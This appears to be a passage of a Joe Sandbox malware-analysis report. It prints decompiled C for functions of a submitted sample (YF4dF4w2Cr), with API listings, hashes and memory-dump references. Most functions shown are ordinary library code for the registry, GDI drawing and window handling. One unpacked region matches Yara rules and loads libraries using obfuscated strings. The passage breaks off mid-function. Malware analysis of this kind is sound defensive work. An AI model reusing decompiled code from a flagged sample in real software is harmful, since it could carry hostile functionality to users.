                  • ReuseDDElParam.USER32(?,000003E8,000003E4,00008000,?), ref: 0040B090
                  • PostMessageA.USER32 ref: 0040B0A0
                    • Part of subcall function 00412C5B: IsWindowEnabled.USER32(?), ref: 00412C64
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: GlobalParam$EnabledH_prolog3_catchLockMessagePostReuseUnlockUnpackWindow
                  • String ID:
                  • API String ID: 4187826474-0
                  • Opcode ID: 7712ed31451a7ab43eb35c33b2217e765a9a71d402a23eff9c4a25d2ad28ad7d
                  • Instruction ID: 9d41415674a00b450912fe41e8faaea42a91231a293c7cca4ef03f372c888be7
                  • Opcode Fuzzy Hash: 7712ed31451a7ab43eb35c33b2217e765a9a71d402a23eff9c4a25d2ad28ad7d
                  • Instruction Fuzzy Hash: 8911A235900109AFDF01EBA1CD46AFE7B74BF04315F14422AB515B72E1DB389A15CBA9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00426668, Relevance: 9.1, APIs: 6, Instructions: 58registryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00426668(intOrPtr __ecx, CHAR* _a4, char* _a8, char* _a12) {
				long _t21;
				void* _t28;

				if( *((intOrPtr*)(__ecx + 0x54)) == 0) {
					return WritePrivateProfileStringA(_a4, _a8, _a12,  *(__ecx + 0x68));
				}
				if(_a8 != 0) {
					_t28 = E0042652C(__ecx, _a4);
					if(_a12 != 0) {
						if(_t28 == 0) {
							L3:
							return 0;
						}
						_t21 = RegSetValueExA(_t28, _a8, 0, 1, _a12, lstrlenA(_a12) + 1);
						L10:
						RegCloseKey(_t28);
						return 0 | _t21 == 0x00000000;
					}
					if(_t28 == 0) {
						goto L3;
					}
					_t21 = RegDeleteValueA(_t28, _a8);
					goto L10;
				}
				_t28 = E00426499(__ecx);
				if(_t28 != 0) {
					_t21 = RegDeleteKeyA(_t28, _a4);
					goto L10;
				}
				goto L3;
			}





                  0x00426673
                  0x00000000
                  0x004266f4
                  0x00426679
                  0x004266a2
                  0x004266a4
                  0x004266b8
                  0x00426686
                  0x00000000
                  0x00426686
                  0x004266d0
                  0x004266d6
                  0x004266d9
                  0x00000000
                  0x004266e3
                  0x004266a8
                  0x00000000
                  0x00000000
                  0x004266ae
                  0x00000000
                  0x004266ae
                  0x00426680
                  0x00426684
                  0x0042668e
                  0x00000000
                  0x0042668e
                  0x00000000

                  APIs
                  • RegDeleteKeyA.ADVAPI32(00000000,?), ref: 0042668E
                  • RegDeleteValueA.ADVAPI32(00000000,00000000), ref: 004266AE
                  • RegCloseKey.ADVAPI32(00000000), ref: 004266D9
                    • Part of subcall function 00426499: RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 004264C9
                    • Part of subcall function 00426499: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 004264EC
                    • Part of subcall function 00426499: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 00426508
                    • Part of subcall function 00426499: RegCloseKey.ADVAPI32(?), ref: 00426518
                    • Part of subcall function 00426499: RegCloseKey.ADVAPI32(?), ref: 00426522
                  • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 004266F4
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Close$CreateDelete$OpenPrivateProfileStringValueWrite
                  • String ID:
                  • API String ID: 1886894508-0
                  • Opcode ID: cf54b3c77ee718f75f42add01bc63d46b6446b20ccf5db03060ca3b177b08ec9
                  • Instruction ID: 89b66a75d349d0838efd71de6006c1518052202ea5fbcc01f482d7d6114c7717
                  • Opcode Fuzzy Hash: cf54b3c77ee718f75f42add01bc63d46b6446b20ccf5db03060ca3b177b08ec9
                  • Instruction Fuzzy Hash: F011A036601235FBCF221F61EC08BAE3B65BF04355F564426FD1599120CBBAC811DB9C
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0042DB24, Relevance: 9.1, APIs: 6, Instructions: 55COMMON
                  Download Yara Rule
                  C-Code - Quality: 77%
                  			E0042DB24(void* __ecx) {
				int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				int _t14;

				_push(__ecx);
				_push(__ecx);
				_t14 = GetDeviceCaps( *(__ecx + 8), 0xa);
				_v12 = GetDeviceCaps( *(__ecx + 8), 8);
				_v8 = _t14;
				E0042D602(__ecx,  &_v12);
				SetMapMode( *(__ecx + 4), 1);
				SetWindowOrgEx( *(__ecx + 4), 0, 0, 0);
				SetViewportOrgEx( *(__ecx + 4),  *(__ecx + 0x20),  *(__ecx + 0x24), 0);
				IntersectClipRect( *(__ecx + 4), 0xffffffff, 0xffffffff, _v12 + 2, _v8 + 2);
				return E0042DA25(_t14, __ecx, 0, 0);
			}








                  0x0042db29
                  0x0042db2a
                  0x0042db3b
                  0x0042db46
                  0x0042db4f
                  0x0042db52
                  0x0042db5c
                  0x0042db6a
                  0x0042db7a
                  0x0042db95
                  0x0042dba7

                  APIs
                  • GetDeviceCaps.GDI32(?,0000000A), ref: 0042DB3B
                  • GetDeviceCaps.GDI32(?,00000008), ref: 0042DB44
                    • Part of subcall function 0042D602: GetViewportExtEx.GDI32(?,?), ref: 0042D615
                    • Part of subcall function 0042D602: GetWindowExtEx.GDI32(?,?), ref: 0042D622
                  • SetMapMode.GDI32(?,00000001), ref: 0042DB5C
                  • SetWindowOrgEx.GDI32(?,00000000,00000000,00000000), ref: 0042DB6A
                  • SetViewportOrgEx.GDI32(?,?,?,00000000), ref: 0042DB7A
                  • IntersectClipRect.GDI32(?,000000FF,000000FF,?,?), ref: 0042DB95
                    • Part of subcall function 0042DA25: GetViewportExtEx.GDI32(00000000,?), ref: 0042DA40
                    • Part of subcall function 0042DA25: GetWindowExtEx.GDI32(00000000,?), ref: 0042DA4D
                    • Part of subcall function 0042DA25: GetDeviceCaps.GDI32(00000000,00000058), ref: 0042DAAD
                    • Part of subcall function 0042DA25: GetDeviceCaps.GDI32(00000000,0000005A), ref: 0042DACA
                    • Part of subcall function 0042DA25: SetMapMode.GDI32(?,00000008), ref: 0042DAF0
                    • Part of subcall function 0042DA25: SetWindowExtEx.GDI32(?,?,?,00000000), ref: 0042DB01
                    • Part of subcall function 0042DA25: SetViewportExtEx.GDI32(?,?,?,00000000), ref: 0042DB12
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CapsDeviceViewportWindow$Mode$ClipIntersectRect
                  • String ID:
                  • API String ID: 1729379761-0
                  • Opcode ID: c8600ce221c2ec6a70bd7dad16ff7971a38c4859d90be0925a3898c37e9b66b8
                  • Instruction ID: 8536639afe39f5eb7b5e1cbf932ac324b1ac82a323fbb308fbb1dad4bb3e740d
                  • Opcode Fuzzy Hash: c8600ce221c2ec6a70bd7dad16ff7971a38c4859d90be0925a3898c37e9b66b8
                  • Instruction Fuzzy Hash: B8018431600614BBDB215B57DC4AD4BBFB9FFC9720B00852DF166921A0DAB1AC10CB24
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0041FEC0, Relevance: 9.1, APIs: 6, Instructions: 52windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0041FEC0(struct HWND__* _a4) {
				void* __ebx;
				void* __edi;
				struct HWND__* _t3;
				struct HWND__* _t6;
				struct HWND__* _t8;
				void* _t10;
				struct HWND__* _t11;

				_t3 = GetFocus();
				_t11 = _t3;
				if(_t11 != 0) {
					_t8 = _a4;
					if(_t11 == _t8) {
						L10:
						return _t3;
					}
					if(E0041FDA4(_t8, _t10, _t11, _t11, 3) != 0) {
						L5:
						if(_t8 == 0 || (GetWindowLongA(_t8, 0xfffffff0) & 0x40000000) == 0) {
							L8:
							_t3 = SendMessageA(_t11, 0x14f, 0, 0);
							goto L9;
						} else {
							_t6 = GetParent(_t8);
							_t3 = GetDesktopWindow();
							if(_t6 == _t3) {
								L9:
								goto L10;
							}
							goto L8;
						}
					}
					_t3 = GetParent(_t11);
					_t11 = _t3;
					if(_t11 == _t8) {
						goto L9;
					}
					_t3 = E0041FDA4(_t8, _t10, _t11, _t11, 2);
					if(_t3 == 0) {
						goto L9;
					}
					goto L5;
				}
				return _t3;
			}










                  0x0041fec6
                  0x0041fecc
                  0x0041fed0
                  0x0041fed3
                  0x0041fed8
                  0x0041ff36
                  0x00000000
                  0x0041ff36
                  0x0041feeb
                  0x0041ff02
                  0x0041ff04
                  0x0041ff25
                  0x0041ff2f
                  0x00000000
                  0x0041ff16
                  0x0041ff17
                  0x0041ff1b
                  0x0041ff23
                  0x0041ff35
                  0x00000000
                  0x0041ff35
                  0x00000000
                  0x0041ff23
                  0x0041ff04
                  0x0041feee
                  0x0041fef0
                  0x0041fef4
                  0x00000000
                  0x00000000
                  0x0041fef9
                  0x0041ff00
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0041ff00
                  0x0041ff39

                  APIs
                  • GetFocus.USER32(?,?,00404DAE,?), ref: 0041FEC6
                  • GetParent.USER32(00000000), ref: 0041FEEE
                    • Part of subcall function 0041FDA4: GetWindowLongA.USER32 ref: 0041FDC5
                    • Part of subcall function 0041FDA4: GetClassNameA.USER32(?,?,0000000A), ref: 0041FDDA
                  • GetWindowLongA.USER32 ref: 0041FF09
                  • GetParent.USER32(?), ref: 0041FF17
                  • GetDesktopWindow.USER32 ref: 0041FF1B
                  • SendMessageA.USER32(00000000,0000014F,00000000,00000000), ref: 0041FF2F
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window$LongParent$ClassDesktopFocusMessageNameSend
                  • String ID:
                  • API String ID: 3020784601-0
                  • Opcode ID: 7138e401b7d464fa63ed0106b9823c3ed7b2c2d69fbe47efeef8b4535bd2ed63
                  • Instruction ID: a3e0ee6632b80016e2cee3cc5ed10369111e6e6cb658273c54acccc958f9d77b
                  • Opcode Fuzzy Hash: 7138e401b7d464fa63ed0106b9823c3ed7b2c2d69fbe47efeef8b4535bd2ed63
                  • Instruction Fuzzy Hash: D501DB3220421333D7211B665C8DFBB2A5D6BD3750F19003BF505A3290DBA8CC87816C
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0043551B, Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 90%
                  			E0043551B(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t48;
				intOrPtr _t57;
				void* _t58;
				void* _t61;

				_t61 = __eflags;
				_t53 = __edx;
				_push(0x2c);
				_push(0x45e0e0);
				E00431818(__ebx, __edi, __esi);
				_t48 = __ecx;
				_t55 =  *((intOrPtr*)(_t58 + 0xc));
				_t57 =  *((intOrPtr*)(_t58 + 8));
				 *((intOrPtr*)(_t58 - 0x1c)) = __ecx;
				 *(_t58 - 0x34) =  *(_t58 - 0x34) & 0x00000000;
				 *((intOrPtr*)(_t58 - 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0xc)) - 4));
				 *((intOrPtr*)(_t58 - 0x28)) = E0043054B(_t58 - 0x3c,  *((intOrPtr*)(_t57 + 0x18)));
				 *((intOrPtr*)(_t58 - 0x2c)) =  *((intOrPtr*)(E00436178(__ecx, __edx, _t55, _t61) + 0x88));
				 *((intOrPtr*)(_t58 - 0x30)) =  *((intOrPtr*)(E00436178(_t48, __edx, _t55, _t61) + 0x8c));
				 *((intOrPtr*)(E00436178(_t48, _t53, _t55, _t61) + 0x88)) = _t57;
				 *((intOrPtr*)(E00436178(_t48, _t53, _t55, _t61) + 0x8c)) =  *((intOrPtr*)(_t58 + 0x10));
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
				 *((intOrPtr*)(_t58 + 0x10)) = 1;
				 *(_t58 - 4) = 1;
				 *((intOrPtr*)(_t58 - 0x1c)) = E004305F0(_t55,  *((intOrPtr*)(_t58 + 0x14)), _t48,  *((intOrPtr*)(_t58 + 0x18)),  *((intOrPtr*)(_t58 + 0x1c)));
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
				 *(_t58 - 4) = 0xfffffffe;
				 *((intOrPtr*)(_t58 + 0x10)) = 0;
				E00435641(_t48, _t53, _t55, _t57, _t61);
				return E0043185D( *((intOrPtr*)(_t58 - 0x1c)));
			}







                  0x0043551b
                  0x0043551b
                  0x0043551b
                  0x0043551d
                  0x00435522
                  0x00435527
                  0x00435529
                  0x0043552c
                  0x0043552f
                  0x00435532
                  0x00435539
                  0x0043554a
                  0x00435558
                  0x00435566
                  0x0043556e
                  0x0043557c
                  0x00435582
                  0x00435589
                  0x0043558c
                  0x004355a2
                  0x004355a5
                  0x0043561a
                  0x00435621
                  0x00435628
                  0x00435635

                  APIs
                  • __CreateFrameInfo.LIBCMT ref: 00435543
                    • Part of subcall function 0043054B: __getptd.LIBCMT ref: 00430559
                    • Part of subcall function 0043054B: __getptd.LIBCMT ref: 00430567
                  • __getptd.LIBCMT ref: 0043554D
                    • Part of subcall function 00436178: __getptd_noexit.LIBCMT ref: 0043617B
                    • Part of subcall function 00436178: __amsg_exit.LIBCMT ref: 00436188
                  • __getptd.LIBCMT ref: 0043555B
                  • __getptd.LIBCMT ref: 00435569
                  • __getptd.LIBCMT ref: 00435574
                  • _CallCatchBlock2.LIBCMT ref: 0043559A
                    • Part of subcall function 004305F0: __CallSettingFrame@12.LIBCMT ref: 0043063C
                    • Part of subcall function 00435641: __getptd.LIBCMT ref: 00435650
                    • Part of subcall function 00435641: __getptd.LIBCMT ref: 0043565E
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                  • String ID:
                  • API String ID: 1602911419-0
                  • Opcode ID: 270b4874b4146d5150989347aab07051d422c89617759b4d376d9bbcefeb06d0
                  • Instruction ID: 12163c9f5d774255b4c5aa6cddf76e7ce5817fe140a7e1809cc9b622f8e45688
                  • Opcode Fuzzy Hash: 270b4874b4146d5150989347aab07051d422c89617759b4d376d9bbcefeb06d0
                  • Instruction Fuzzy Hash: 56110A71C0020AEFDF00EFA5C846BAD7BB0FF09318F50956AF814A7252DB789A119F58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0041FE4A, Relevance: 9.0, APIs: 6, Instructions: 46COMMON
                  Download Yara Rule
                  C-Code - Quality: 38%
                  			E0041FE4A(struct HWND__* _a4, struct tagPOINT _a8, intOrPtr _a12) {
				struct tagRECT _v20;
				struct HWND__* _t12;
				struct HWND__* _t21;

				ClientToScreen(_a4,  &_a8);
				_push(5);
				_push(_a4);
				while(1) {
					_t12 = GetWindow();
					_t21 = _t12;
					if(_t21 == 0) {
						break;
					}
					if(GetDlgCtrlID(_t21) != 0xffff && (GetWindowLongA(_t21, 0xfffffff0) & 0x10000000) != 0) {
						GetWindowRect(_t21,  &_v20);
						_push(_a12);
						if(PtInRect( &_v20, _a8) != 0) {
							return _t21;
						}
					}
					_push(2);
					_push(_t21);
				}
				return _t12;
			}






                  0x0041fe5b
                  0x0041fe67
                  0x0041fe69
                  0x0041feae
                  0x0041feae
                  0x0041feb0
                  0x0041feb4
                  0x00000000
                  0x00000000
                  0x0041fe7a
                  0x0041fe91
                  0x0041fe97
                  0x0041fea9
                  0x00000000
                  0x0041febc
                  0x0041fea9
                  0x0041feab
                  0x0041fead
                  0x0041fead
                  0x0041feb9

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window$Rect$ClientCtrlLongScreen
                  • String ID:
                  • API String ID: 1315500227-0
                  • Opcode ID: aaf4557226aed99c3d547442cdc0ccab5e13162b72004c03008042cfd5e9e743
                  • Instruction ID: 979a72b2d57e80b3412745ffee18be6cc6d8b60f5167ca6da8359f6ff8559c25
                  • Opcode Fuzzy Hash: aaf4557226aed99c3d547442cdc0ccab5e13162b72004c03008042cfd5e9e743
                  • Instruction Fuzzy Hash: 3C018F36100219BBCB219F56DC08EEF3B28FF56710F454532F915D21A1E734D9578A9C
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00429A19, Relevance: 9.0, APIs: 6, Instructions: 42windowCOMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 91%
                  			E00429A19(void* __ecx) {
				void* _t13;
				struct HMENU__* _t14;
				void* _t15;
				struct HMENU__* _t16;
				void* _t17;
				intOrPtr _t19;
				void* _t29;
				void* _t33;
				void* _t34;

				_t25 = __ecx;
				_t33 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x28)) != 0) {
					__eax = DestroyMenu(__eax);
				}
				_t13 =  *(_t33 + 0x2c);
				if(_t13 != 0) {
					FreeResource(_t13);
				}
				_t14 =  *(_t33 + 0x30);
				if(_t14 != 0) {
					DestroyMenu(_t14);
				}
				_t15 =  *(_t33 + 0x34);
				if(_t15 != 0) {
					FreeResource(_t15);
				}
				_t16 =  *(_t33 + 0x38);
				if(_t16 != 0) {
					DestroyMenu(_t16);
				}
				_t17 =  *(_t33 + 0x3c);
				if(_t17 != 0) {
					FreeResource(_t17);
				}
				E004010B0( *((intOrPtr*)(_t33 + 0x64)) - 0x10, _t29);
				_t25 = _t33;
				_pop(_t33);
				_push(_t33);
				_t34 = _t25;
				_t19 =  *((intOrPtr*)(_t34 + 0x10));
				if(_t19 != 0) {
					_t19 =  *((intOrPtr*)(_t19 + 0x1c))();
				}
				 *(_t34 + 0x1c) =  *(_t34 + 0x1c) & 0x00000000;
				return _t19;
			}












                  0x00429a19
                  0x00429a1c
                  0x00429a2a
                  0x00429a2d
                  0x00429a2d
                  0x00429a2f
                  0x00429a34
                  0x00429a37
                  0x00429a37
                  0x00429a3d
                  0x00429a42
                  0x00429a45
                  0x00429a45
                  0x00429a47
                  0x00429a4c
                  0x00429a4f
                  0x00429a4f
                  0x00429a55
                  0x00429a5a
                  0x00429a5d
                  0x00429a5d
                  0x00429a5f
                  0x00429a64
                  0x00429a67
                  0x00429a67
                  0x00429a73
                  0x00429a79
                  0x00429a7b
                  0x004126f9
                  0x004126fa
                  0x004126ff
                  0x00412703
                  0x00412705
                  0x00412705
                  0x00412708
                  0x0041270d

                  APIs
                  • DestroyMenu.USER32(?,?,?,004171DF,00000004,00417244), ref: 00429A2D
                  • FreeResource.KERNEL32(?,?,?,004171DF,00000004,00417244), ref: 00429A37
                  • DestroyMenu.USER32(?,?,?,004171DF,00000004,00417244), ref: 00429A45
                  • FreeResource.KERNEL32(?,?,?,004171DF,00000004,00417244), ref: 00429A4F
                  • DestroyMenu.USER32(?,?,?,004171DF,00000004,00417244), ref: 00429A5D
                  • FreeResource.KERNEL32(?,?,?,004171DF,00000004,00417244), ref: 00429A67
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: DestroyFreeMenuResource
                  • String ID:
                  • API String ID: 2790856715-0
                  • Opcode ID: 8081848a1ddf500aaf7c4141dd612c7d736c7543525f0c36d1939d0ab3da03d1
                  • Instruction ID: 9dce847ac49ba06b3d19df9fb6a45dc263d23366e3dd4b2b53d37e8394955563
                  • Opcode Fuzzy Hash: 8081848a1ddf500aaf7c4141dd612c7d736c7543525f0c36d1939d0ab3da03d1
                  • Instruction Fuzzy Hash: D0F0EC357007509B9B20EF7BAE48E57B7ECBE44740745182EB846D3B60DA78EC018A29
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0231A58F, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 102libraryCOMMON
                  Download Yara Rule
                  APIs
                  • LoadLibraryW.KERNEL32(00000000), ref: 0231A857
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646512151.0000000002311000.00000020.00000001.sdmp, Offset: 02311000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2311000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID: $C}q$F6.;$JN$ZGd
                  • API String ID: 1029625771-657663392
                  • Opcode ID: b11da5ab64e63239f6ab3881d01cee195193e1828c6ef704a8b2ccf56672cb66
                  • Instruction ID: 1e725d639f674c3af74875233b5cb26bc99fde31fd1633272fd6a8f412dabe16
                  • Opcode Fuzzy Hash: b11da5ab64e63239f6ab3881d01cee195193e1828c6ef704a8b2ccf56672cb66
                  • Instruction Fuzzy Hash: 2C61A8B4C55369CBDB208F8199917CDBB74FB11304F6185C9D2A93B204EB740A86CF95
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004128A9, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 94windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 79%
                  			E004128A9(void* __edx) {
				signed int _v8;
				void _v136;
				int _v140;
				int _v144;
				char _v148;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t21;
				unsigned int _t23;
				char* _t35;
				struct HBITMAP__* _t37;
				unsigned int _t40;
				signed short _t42;
				intOrPtr _t46;
				int _t47;
				unsigned int _t49;
				void* _t52;
				signed char* _t53;
				void* _t54;
				signed int _t58;
				intOrPtr _t59;
				void* _t60;
				signed int _t62;
				void* _t63;
				intOrPtr _t64;
				signed int _t66;
				signed int _t68;

				_t52 = __edx;
				_t66 = _t68;
				_t21 =  *0x463404; // 0x38a11573
				_v8 = _t21 ^ _t66;
				_push(_t60);
				_push(_t54);
				_t23 = GetMenuCheckMarkDimensions();
				_t47 = _t23;
				_t40 = _t23 >> 0x10;
				_v144 = _t47;
				_v140 = _t40;
				if(_t47 <= 4) {
					L3:
					E00406436(_t40, _t47, _t54, _t60, _t73);
				} else {
					_t73 = _t40 - 5;
					if(_t40 <= 5) {
						goto L3;
					}
				}
				if(_t47 > 0x20) {
					_t47 = 0x20;
					_v144 = _t47;
				}
				asm("cdq");
				_t62 = _t47 + 0xf >> 4;
				_t58 = (_t47 - 4 - _t52 >> 1) + (_t62 << 4) - _t47;
				if(_t58 > 0xc) {
					_t58 = 0xc;
				}
				if(_t40 > 0x20) {
					_t40 = 0x20;
					_v140 = _t40;
				}
				E00431160(_t58,  &_v136, 0xff, 0x80);
				_t35 = _t66 + (_t40 - 6 >> 1) * _t62 * 2 - 0x84;
				_t53 = 0x4514b4;
				_t63 = _t62 + _t62;
				_v148 = 5;
				do {
					_t42 = ( *_t53 & 0x000000ff) << _t58;
					_t53 =  &(_t53[1]);
					_t49 =  !_t42 & 0x0000ffff;
					 *_t35 = _t49 >> 8;
					 *(_t35 + 1) = _t49;
					_t35 = _t35 + _t63;
					_t15 =  &_v148;
					 *_t15 = _v148 - 1;
				} while ( *_t15 != 0);
				_t37 = CreateBitmap(_v144, _v140, 1, 1,  &_v136);
				_pop(_t59);
				_pop(_t64);
				 *0x466560 = _t37;
				_pop(_t46);
				if(_t37 == 0) {
					 *0x466560 = _t37;
				}
				return E00430650(_t37, _t46, _v8 ^ _t66, _t53, _t59, _t64);
			}
































                  0x004128a9
                  0x004128ac
                  0x004128b4
                  0x004128bb
                  0x004128bf
                  0x004128c0
                  0x004128c1
                  0x004128c7
                  0x004128d0
                  0x004128d3
                  0x004128d9
                  0x004128df
                  0x004128e6
                  0x004128e6
                  0x004128e1
                  0x004128e1
                  0x004128e4
                  0x00000000
                  0x00000000
                  0x004128e4
                  0x004128ee
                  0x004128f2
                  0x004128f3
                  0x004128f3
                  0x004128fc
                  0x00412902
                  0x00412910
                  0x00412915
                  0x00412919
                  0x00412919
                  0x0041291d
                  0x00412921
                  0x00412922
                  0x00412922
                  0x00412939
                  0x00412949
                  0x00412950
                  0x00412955
                  0x00412957
                  0x00412961
                  0x00412967
                  0x0041296a
                  0x0041296e
                  0x00412976
                  0x00412978
                  0x0041297b
                  0x0041297d
                  0x0041297d
                  0x0041297d
                  0x0041299c
                  0x004129a2
                  0x004129a3
                  0x004129a4
                  0x004129a9
                  0x004129ac
                  0x004129ba
                  0x004129ba
                  0x004129ca

                  APIs
                  • GetMenuCheckMarkDimensions.USER32 ref: 004128C1
                  • _memset.LIBCMT ref: 00412939
                  • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 0041299C
                  • LoadBitmapA.USER32 ref: 004129B4
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
                  • String ID:
                  • API String ID: 4271682439-3916222277
                  • Opcode ID: b5f77ca9ce8d0de09fb24572092bc98af35eea4ddacb5d1be8eaecbc8a1ea975
                  • Instruction ID: 38b95418af95e8854720099d7e8ddae421d8a6e1ae950d27b7bdda4e2e8a65fc
                  • Opcode Fuzzy Hash: b5f77ca9ce8d0de09fb24572092bc98af35eea4ddacb5d1be8eaecbc8a1ea975
                  • Instruction Fuzzy Hash: F6312971A002159FEB20CF299D85BE97BB4FB44304F4541BBF549E7292DB748D84CB54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040B638, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                  Download Yara Rule
                  C-Code - Quality: 96%
                  			E0040B638(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t39;
				intOrPtr _t47;
				intOrPtr _t65;
				void* _t68;
				void* _t69;

				_t63 = __edx;
				_t53 = __ebx;
				_push(0x28);
				E00431B04(E0044AF3A, __ebx, __edi, __esi);
				_t65 =  *((intOrPtr*)(_t69 + 8));
				_t68 = __ecx;
